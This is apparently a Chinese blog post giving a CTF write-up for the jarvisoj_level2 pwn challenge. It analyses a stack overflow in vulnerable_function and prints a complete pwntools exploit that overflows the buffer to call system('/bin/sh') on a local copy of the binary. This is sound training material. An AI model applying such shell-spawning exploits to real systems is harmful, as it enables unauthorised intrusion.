jarvisoj_level2

女侠展昭

 关注

阅读 39

2022-03-20

jarvisoj_level2

使用checksec查看:
在这里插入图片描述
放进IDA中分析:
在这里插入图片描述

  • 存在漏洞函数vulnerable_function(),跟进。

vulnerable_function()
在这里插入图片描述

  • return read(0, &buf, 0x100u);:向变量buf中写入0x100长度的数据,变量buf距离ebp 0x88,存在栈溢出。
  • system("echo Input:");:有system()函数可以使用

查询该程序中的字符串:
在这里插入图片描述

  • 发现有/bin/sh

题目思路

  • 利用栈溢出跳转system@PLT
  • system参数给上/bin/sh
  • getshell

步骤解析

完整exp

from pwn import * 

#start
r = process("../buu/jarvisoj_level2")
elf = ELF("../buu/jarvisoj_level2")

#params
sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

#attack
payload = b'M' * (0x88 + 4) + p32(sys_addr) + b'M' * 4 + p32(bin_sh_addr)
r.sendline(payload)

r.interactive()

相关推荐

jarvisoj_level6_x64

书坊尚 29 0 0

jarvisoj_fm

非凡兔 42 0 0

07、XMLHttpRequest Level2

那小那小 40 0 0

2、xss-labs之level2

40dba2f2a596 14 0 0

Xss-labs-level1-2

鱼满舱 58 0 0

前端AJAX学习笔记——XMLHttpRequest Level2

崭新的韭菜 87 0 0

xss-labs:level1-level10

Mhhao 71 0 0

level6

木樨点点 40 0 0

IDEA报错Target Level '1.5' Is Incompatible With Source Level '1.8'

Ad大成 60 0 0

mysql log level

Ad大成 11 0 0

精彩评论(0)

0 0 举报